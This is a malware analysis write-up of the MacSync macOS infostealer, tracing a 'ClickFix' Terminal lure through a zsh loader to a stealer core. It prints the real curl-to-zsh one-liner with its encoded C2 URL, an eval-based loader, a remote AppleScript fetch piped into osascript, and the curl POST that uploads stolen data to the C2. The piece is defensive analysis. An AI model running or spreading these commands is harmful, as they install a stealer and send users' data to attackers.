← Back to Cybersecurity Projects
Malware Analysis — Write-Up

MacSync Stealer: Static Malware Analysis

Author:Kelvin Creighton
#malware#macos#zsh#static-analysis#applescript
01

Initial Discovery

In December 2025, a friend encountered a suspicious 'ClickFix' campaign. Intrigued, I decided to take a look. The lure was simple: a popup urging users to download an application by running a 'simple' command in their Terminal. To build trust, the campaign even included an embedded video of someone supposedly running the command on a VM. The command provided was an obfuscated one-liner designed to bypass mental filters by appearing 'technical' and 'complicated':

STEP 01The Malicious One-Liner
INPUTcurl -kfsSL $(echo 'aHR0cDovL2ZvbGRleG1vb24ud29ybGQvY3VybC9lYzdlNzRkM2E1MDY1NzZmZmFmNTAyMDg3Yjk1YzIzYzEzMWExYWRmMmU1ZDAwYjkwN2UwZDc3ZDIyYjQzN2Ey'|base64 -D)|zsh
OUTPUT[Executes Stage 1 Loader]

Reason: The command decodes a Base64 string to reveal the hidden C2 URL (http://foldexmoon.world/curl/...), downloads the payload silently using curl, and immediately pipes it into zsh for execution. Obfuscating the URL prevents users from easily checking it in a browser, where security filters might trigger a warning.

STEP 02C2 Header Analysis
INPUTcurl -I --max-time 5 http://foldexmoon.world/curl/ec7e74d3a506576ffaf502087b95c23c131a1adf2e5d00b907e0d77d22b437a2
OUTPUTHTTP/1.1 200 OK Content-Type: application/octet-stream Content-Length: 834 Server: cloudflare Content-Disposition: attachment; filename="ec7e74d3a506576ffaf502087b95c23c131a1adf2e5d00b907e0d77d22b437a2.daily"

Reason: The server delivers an 834-byte binary stream with a .daily extension. The use of Cloudflare and a non-standard extension is a common obfuscation tactic for Malware-as-a-Service (MaaS) distribution.

02

Stage 1: The Zsh Loader

The downloaded file revealed itself to be a Zsh script. Its sole purpose is to decode and execute a second-stage payload entirely in memory, a technique known as 'fileless' execution which helps evade traditional antivirus scans that look for malicious files on disk.

STEP 01Deobfuscating the Stager
INPUTcat ec7e74d3a506576ffaf502087b95c23c131a1adf2e5d00b907e0d77d22b437a2.daily
OUTPUT#!/bin/zsh d25941=$(base64 -D <<'PAYLOAD_m14659633818266' | gunzip H4sIAFAeM2kAA+VU0W7TMBR971dcsmrqJJI4cROvHWWbJsHQmIa0ISYBqhz7urXq2FHism7AvxO6... PAYLOAD_m14659633818266 ) eval "$d25941"

Reason: The script uses base64 -D (a macOS-specific flag) and gunzip to unpack the hidden payload. The eval command then executes the result immediately.

STEP 02Extracting Stage 2
INPUTecho "[BASE64_DATA]" | base64 -D | gunzip > stage2.sh
OUTPUT[A 1.3KB Zsh Script]

Reason: By manually decoding the payload, we reveal the core logic of the MacSync Stealer before it can execute and hide itself.

03

Stage 2: The Stealer Core

The second stage is a sophisticated Zsh-based stealer that acts as a background daemon. It is designed to be persistent, stealthy, and highly dynamic by fetching AppleScript payloads directly from the C2 server.

STEP 01Stealth Mechanisms
INPUThead -n 10 stage2.sh
OUTPUTdaemon_function() { exec </dev/null exec >/dev/null exec 2>/dev/null local domain="foldexmoon.world"

Reason: The script redirects all standard streams to /dev/null, ensuring no output is visible in the user's Terminal. It then defines its Command & Control (C2) infrastructure.

STEP 02Dynamic AppleScript Execution
INPUTgrep 'osascript' stage2.sh
OUTPUTcurl -k -s ... "http://$domain/dynamic?txd=$token" | osascript

Reason: This is a critical discovery. The malware downloads dynamic AppleScript code and pipes it into osascript. This allows the attacker to push new stealing logic (Keychain access, browser data harvesting, etc.) without updating the main script.

STEP 03Data Exfiltration (The 'Gate')
INPUTgrep 'POST' stage2.sh
OUTPUTcurl -k -X POST ... -F "file=@/tmp/osalogging.zip" ... "http://$domain/gate"

Reason: The malware bundles stolen data into /tmp/osalogging.zip and uploads it to the /gate endpoint. Research confirms that osalogging.zip is a known Indicator of Compromise (IoC) for the MacSync family.

04

Context & Research

After my initial analysis in December 2025, further research confirmed this was MacSync Stealer (also known as Mac.c), a Malware-as-a-Service (MaaS) created by the threat actor 'Mentalpositive'.

Evolution of MacSync

  • Origins: Emerged in April 2025 as a cheap, accessible infostealer for entry-level cybercriminals.
  • Social Engineering: Leverages the complexity of Terminal commands to bypass user suspicion. The use of base64 encoding prevents link discovery through browser-based security filters.
  • Trust Building: Employs social proof, such as embedded videos of VMs supposedly running the command safely, to manipulate users into taking high-risk actions.
  • Distribution: Evolved from 'ClickFix' Terminal commands to highly sophisticated, Apple-notarized Swift applications to bypass Gatekeeper.
  • Infrastructure: Extensive use of the .world and .shop TLDs (e.g., foldexmoon.world) for C2 operations.
05

Key Takeaways

Security Recommendations

  • Never copy and paste commands from untrusted websites into your Terminal, even if they appear to be from 'trusted' sources like GitHub or ChatGPT.
  • The use of curl | sh or curl | osascript is a high-risk pattern that should be treated with extreme suspicion.
  • Regularly audit your /tmp directory and background processes for unusual activity, particularly those redirecting all output to /dev/null.
Kelvin CreightonMalware Analysis — Write-UpAll steps performed in a legal environment.